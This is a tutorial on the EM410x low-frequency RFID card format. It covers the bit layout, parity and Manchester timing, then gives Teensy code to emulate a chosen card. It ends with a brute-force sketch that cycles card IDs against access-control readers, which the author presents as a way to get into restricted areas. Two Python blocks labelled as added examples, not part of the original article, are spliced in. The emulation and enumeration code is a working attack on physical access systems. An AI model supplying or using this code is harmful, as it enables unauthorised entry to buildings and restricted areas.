Open, 2013/08/22 saveth

First of all, I have to mention again the low frequency cards (EM410x and the like) that work at 125 kHz, so that you can follow what comes next.

What is low frequency? Here is the definition:

Low frequency (LF) refers to radio waves in the band from 30 kHz to 300 kHz. Some radio frequency identification (RFID) tags use low frequencies. These tags are often called LFIDs or LowFIDs (Low Frequency Identification).

The frequency most commonly used (though not the only one) by LFID/LowFID tags is 125 kHz or 134 kHz. This frequency is only the carrier that low frequency RFID is built on; by itself it has no function, that is, the frequency does not provide the so-called ID identification, reading, writing and so on. Those are defined by the tag families built on top of it, such as HID, T55xx and EM410x, which you run into all the time in daily life. This article is about the EM410x family, which is based on 125 kHz and is used for access control ID identification.

Here is the format of EM410x:

111111111              9 header bits, all ones
D00 D01 D02 D03 P0     \ first 8 bits: version or manufacturer ID
D10 D11 D12 D13 P1     /
D20 D21 D22 D23 P2     \
D30 D31 D32 D33 P3     |
D40 D41 D42 D43 P4     |
D50 D51 D52 D53 P5     | 32 bits of data
D60 D61 D62 D63 P6     |
D70 D71 D72 D73 P7     |
D80 D81 D82 D83 P8     |
D90 D91 D92 D93 P9     /
PC0 PC1 PC2 PC3 S0     4 column parity bits and the stop bit

(P0 to P9 are the 10 row parity bits, one per 4-bit row.)

The 64 bits are: nine consecutive 1s as the start of the frame, D00-D93 as the user data (the first two rows, D00-D13, are the 8-bit version/manufacturer byte and D20-D93 the 32-bit card data), P0-P9 as the row parity bits, PC0-PC3 as the column parity bits, and S0 (always 0) as the end of the frame.

Even parity is simple to work out: count the 1s in the 4 data bits. If the count is odd, the parity bit is 1; if it is even, the parity bit is 0, so that the row including its parity bit always contains an even number of 1s.

For example, 0x1 = 0001 has one 1 (odd), so the row is sent as 00011. 0x6 = 0110 has two 1s (even), so the row is sent as 01100. 1110 has three 1s (odd), so the row is of course 11101.

The following practical examples illustrate the EM410x format:

Suppose I have an EM410x card; the ID printed on it is:

0005256306

If you read the card with a Proxmark3 or another low frequency reader, you will see two extra digits in front of the ID: the 8-bit version, manufacturer or user-defined byte. Read with a Proxmark3, the ID is:

0x0600503472

Here 0x00503472 = 5256306 is the printed card number, and 0x06 is the identifier byte. What does the frame look like? Let's work through it:

First, the data header:

111111111

Card number data and row parity bits:

0 = 0000 0
6 = 0110 0
0 = 0000 0
0 = 0000 0
5 = 0101 0
0 = 0000 0
3 = 0011 0
4 = 0100 1
7 = 0111 1
2 = 0010 1
p = 0001 (column parity bits) 0 (stop bit)

Putting it together, the full 64-bit frame is:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010
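To make the layout above concrete, here is an added example (not code from the original article) that builds the 64-bit frame from a version byte and a 32-bit card number, and parses a frame back while checking the 9-bit header, every row parity bit, every column parity bit and the stop bit. It goes slightly beyond the page's single card: it rejects any frame with a flipped bit, which is how a reader tells a corrupt read from a valid one. The function names and the card values are this example's own.

```python
# Added example, not part of the original article: EM410x frame encoder/decoder.
# Layout: 9 header ones, 10 rows of (4 data bits + even row parity),
# 4 even column parity bits, 1 stop bit (0). Total 64 bits.
from typing import Tuple

HEADER = "1" * 9


def even_parity(bits: str) -> str:
    """Even parity bit: '1' if the number of ones is odd, else '0'."""
    return "1" if bits.count("1") % 2 else "0"


def em410x_encode(version: int, card_id: int) -> str:
    """Build the 64-bit EM410x bit string for an 8-bit version byte and a 32-bit ID."""
    if not 0 <= version <= 0xFF or not 0 <= card_id <= 0xFFFFFFFF:
        raise ValueError("version must fit in 8 bits and card_id in 32 bits")
    nibbles = f"{version:02X}{card_id:08X}"          # 10 hex digits, most significant first
    rows = [f"{int(h, 16):04b}" for h in nibbles]    # 10 rows of 4 data bits
    frame = HEADER
    for row in rows:
        frame += row + even_parity(row)              # row parity follows each nibble
    columns = ["".join(r[i] for r in rows) for i in range(4)]
    frame += "".join(even_parity(col) for col in columns) + "0"   # column parity + stop bit
    assert len(frame) == 64
    return frame


def em410x_decode(frame: str) -> Tuple[int, int]:
    """Parse a 64-bit frame and return (version, card_id); raise ValueError on any bad bit."""
    if len(frame) != 64 or set(frame) - {"0", "1"}:
        raise ValueError("frame must be 64 bits of '0'/'1'")
    if frame[:9] != HEADER:
        raise ValueError("missing 9-bit header")
    if frame[63] != "0":
        raise ValueError("stop bit is not 0")
    rows = []
    for r in range(10):
        chunk = frame[9 + 5 * r: 14 + 5 * r]        # rows occupy bits 9..58
        data, parity = chunk[:4], chunk[4]
        if even_parity(data) != parity:
            raise ValueError(f"row parity error in row {r}")
        rows.append(data)
    for c in range(4):                               # column parity bits are 59..62
        col = "".join(r[c] for r in rows)
        if even_parity(col) != frame[59 + c]:
            raise ValueError(f"column parity error in column {c}")
    value = int("".join(rows), 2)                    # 40 bits: version byte then 32-bit ID
    return value >> 32, value & 0xFFFFFFFF


def pretty(frame: str) -> str:
    """Space-separated view: header, ten 5-bit rows, then column parity + stop bit."""
    parts = [frame[:9]] + [frame[9 + 5 * i: 14 + 5 * i] for i in range(11)]
    return " ".join(parts)


if __name__ == "__main__":
    f = em410x_encode(0x06, 0x00503472)   # the card worked through above (constructed input)
    print(pretty(f))
    print(em410x_decode(f))               # (6, 5256306)
```

Running it prints the same row-by-row string the article derives by hand; flipping any single bit of that string makes em410x_decode raise, because a single flip always breaks either a row or a column parity check.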

That is the EM410x format. If anything is still unclear, look it up with Google or another search engine; next we look at how to emulate an EM410x tag with a Teensy.

Emulating an EM410x tag with a Teensy


List of hardware components:

1. Low frequency coil for 125 kHz
2. Capacitor
3. Resistor, 10K
4. Teensy++ 2.0

How to make a 125 kHz resonant circuit: you need the LC resonance formula

f = 1 / (2π √(LC)),   or rearranged for the capacitor,   C = 1 / ((2π f)² L)

where f is the resonant frequency, L the coil inductance and C the capacitance.

If the coil you bought is 345 µH, you need a 4700 pF capacitor; if it is 730 µH, you need 2200 pF (both give f ≈ 125 kHz). Once the antenna is built, load the following code onto a Teensy++ 2.0, or use an Arduino board.

Teensy++ 2.0 EM410x simulation code is as follows:

String sStart = "111111111";   // 9 header bits, all ones
String sStop  = "0";           // stop bit
int data_to_spoof[64];
int coil_pin = 9;
int a, b, c, d;                // ones counted per column, for the 4 column parity bits
byte version = 0x06;           // 8-bit version / manufacturer byte (0x06 on the card above)
unsigned long id = 0x503472;   // 32-bit card number
char HexCode[11];              // 10 hex digits plus the terminating NUL

void setup() {
  // Serial.begin(9600);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  a = b = c = d = 0;
  // 2 hex digits of version then 8 of id, most significant nibble first
  sprintf(HexCode, "%02X%08lX", version, id);
  String s = sStart;
  for (int i = 0; i < 10; i++) {
    s += Em4xCode(HexCode[i]);   // 4 data bits followed by the row parity bit
  }
  s += EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
  // Serial.println(s);          // 64 characters
  toCode(s);
}

// Manchester: each bit is sent as two half-bits, 1 -> HIGH then LOW, 0 -> LOW then HIGH
void set_pin_manchester(int clock_half, int signal) {
  int man_encoded = clock_half ^ signal;
  digitalWrite(coil_pin, man_encoded ? HIGH : LOW);
}

// Hex digit -> 4 data bits plus even row parity; also counts the ones per column in a..d
String Em4xCode(char code) {
  int v = (code <= '9') ? code - '0' : code - 'A' + 10;
  String row = "";
  int ones = 0;
  if (v & 8) { a++; ones++; row += "1"; } else row += "0";
  if (v & 4) { b++; ones++; row += "1"; } else row += "0";
  if (v & 2) { c++; ones++; row += "1"; } else row += "0";
  if (v & 1) { d++; ones++; row += "1"; } else row += "0";
  return row + EvenParity(ones);
}

String EvenParity(int Parity) {
  if ((Parity % 2) == 1) return "1";
  return "0";
}

void toCode(String s) {
  for (int i = 0; i < 64; i++) {
    data_to_spoof[i] = (s[i] == '0') ? 0 : 1;
  }
}

void loop() {
  // one bit = 64 carrier cycles at 125 kHz = 512 us, so 256 us per half-bit
  for (int i = 0; i < 64; i++) {
    set_pin_manchester(0, data_to_spoof[i]);
    delayMicroseconds(256);
    set_pin_manchester(1, data_to_spoof[i]);
    delayMicroseconds(256);
  }
}

The point here, in case you are wondering why the bits are sent this way: the data is Manchester encoded, so here is a brief explanation.

For example, to send the 64-bit frame:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

So how long does one bit take? An EM410x bit lasts 64 carrier cycles (RF/64); at 125 kHz one cycle is 8 µs, so one bit is 64 × 8 µs = 512 µs. Manchester code represents each data bit with two half-bits: a 1 is sent as 10 and a 0 as 01. Each half-bit therefore lasts 512 µs / 2 = 256 µs, which is why the program converts the 64-bit frame to Manchester code and holds each half-bit with delayMicroseconds(256).
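The timing and the 10/01 mapping described above, as an added example that is not part of the original article: it Manchester-encodes the 64-bit frame into the sequence of coil levels the sketch drives (the same clock_half XOR data rule as set_pin_manchester), decodes such a level sequence back, and computes the air time of one frame. It also goes one step beyond the page with a reader-side sync routine that finds the frame boundary in a continuous bit stream, which works because nine consecutive ones can only be the header (every row carries an even parity bit, so the longest run of ones anywhere else is 8, and the stop bit is 0). The frame string is the one worked out above, embedded here as constructed input.

```python
# Added example, not from the original article: Manchester coding of an EM410x frame
# at the article's timing (RF/64 at 125 kHz: 512 us per bit, 256 us per half-bit).
from typing import List

CARRIER_HZ = 125_000
CYCLES_PER_BIT = 64
BIT_US = CYCLES_PER_BIT * 1_000_000 / CARRIER_HZ    # 512.0
HALF_BIT_US = BIT_US / 2                             # 256.0

# Constructed input: the frame for version 0x06, ID 0x00503472 derived in the article.
FRAME = ("111111111" "00000" "01100" "00000" "00000" "01010"
         "00000" "00110" "01001" "01111" "00101" "00010")


def manchester_encode(bits: str) -> List[int]:
    """Half-bit coil levels: data 1 -> (1, 0), data 0 -> (0, 1), as clock_half ^ bit."""
    levels = []
    for b in bits:
        for clock_half in (0, 1):
            levels.append(clock_half ^ int(b))
    return levels


def manchester_decode(levels: List[int]) -> str:
    """Recover bits from half-bit levels; reject a pair with no mid-bit transition."""
    if len(levels) % 2:
        raise ValueError("odd number of half-bits")
    bits = []
    for first, second in zip(levels[0::2], levels[1::2]):
        if first == second:
            raise ValueError("invalid Manchester pair (no transition in the middle of the bit)")
        bits.append("1" if first == 1 else "0")
    return "".join(bits)


def frame_duration_us(bits: str) -> float:
    """Air time for one transmission of the frame (64 bits -> 32768 us)."""
    return len(bits) * BIT_US


def extract_frame(stream: str) -> str:
    """Align to the 9-one header in a continuous decoded stream and return one 64-bit frame.

    A tag repeats its frame back to back, so the reader can start listening anywhere;
    the header is the only place nine ones in a row can occur.
    """
    start = stream.find("1" * 9)
    if start < 0 or start + 64 > len(stream):
        raise ValueError("no complete EM410x frame in stream")
    return stream[start:start + 64]


if __name__ == "__main__":
    levels = manchester_encode(FRAME)
    print(len(levels), "half-bits,", frame_duration_us(FRAME), "us per frame")
    # A reader that starts listening 17 bits into a repeating transmission still syncs:
    print(extract_frame(manchester_decode(manchester_encode(FRAME * 3))[17:]) == FRAME)
```

Each frame takes 64 × 512 µs = 32.768 ms on air, which is the floor on how fast any one ID can be presented regardless of what the host loop does around it.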

When we did the emulation with the Teensy we found that, with some exhaustive testing, we could break through the limitation of the access control system and get into the restricted area more quickly: in the test environment the card reader read without any delay, so we could enumerate tag IDs extremely fast. However, every access control system has its own settings and environmental factors, so we are not sure the following exhaustive code suits everyone; this article only puts forward the conjecture of its feasibility.

Here is the code for the brute force test:

String sStart = "111111111";   // 9 header bits, all ones
String sStop  = "0";           // stop bit
int data_to_spoof[64];
int led = 6;
int coil_pin = 9;
int a, b, c, d;                // ones counted per column, for the 4 column parity bits
byte version = 0x06;           // 8-bit version / manufacturer byte
unsigned long id;              // 32-bit card number currently being tried
char HexCode[11];              // 10 hex digits plus the terminating NUL

void setup() {
  // Serial.begin(9600);
  pinMode(led, OUTPUT);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  id = 0x502E96;               // first ID of the range to enumerate
}

// Manchester: each bit is sent as two half-bits, 1 -> HIGH then LOW, 0 -> LOW then HIGH
void set_pin_manchester(int clock_half, int signal) {
  int man_encoded = clock_half ^ signal;
  digitalWrite(coil_pin, man_encoded ? HIGH : LOW);
}

// Hex digit -> 4 data bits plus even row parity; also counts the ones per column in a..d
String Em4xCode(char code) {
  int v = (code <= '9') ? code - '0' : code - 'A' + 10;
  String row = "";
  int ones = 0;
  if (v & 8) { a++; ones++; row += "1"; } else row += "0";
  if (v & 4) { b++; ones++; row += "1"; } else row += "0";
  if (v & 2) { c++; ones++; row += "1"; } else row += "0";
  if (v & 1) { d++; ones++; row += "1"; } else row += "0";
  return row + EvenParity(ones);
}

String EvenParity(int Parity) {
  if ((Parity % 2) == 1) return "1";
  return "0";
}

void toCode(String s) {
  for (int i = 0; i < 64; i++) {
    data_to_spoof[i] = (s[i] == '0') ? 0 : 1;
  }
}

void loop() {
  a = b = c = d = 0;
  sprintf(HexCode, "%02X%08lX", version, id);
  String s = sStart;
  for (int i = 0; i < 10; i++) {
    s += Em4xCode(HexCode[i]);
  }
  s += EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
  // Serial.println(s);
  toCode(s);
  for (int ii = 0; ii < 2; ii++) {      // send each candidate frame twice
    for (int i = 0; i < 64; i++) {
      set_pin_manchester(0, data_to_spoof[i]);
      delayMicroseconds(265);
      set_pin_manchester(1, data_to_spoof[i]);
      delayMicroseconds(265);
    }
  }
  if (id == 0x50308A) { digitalWrite(led, HIGH); }   // marker: the known-good test ID was reached
  id += 1;                     // unsigned long wraps back to 0 after 0xFFFFFFFF
}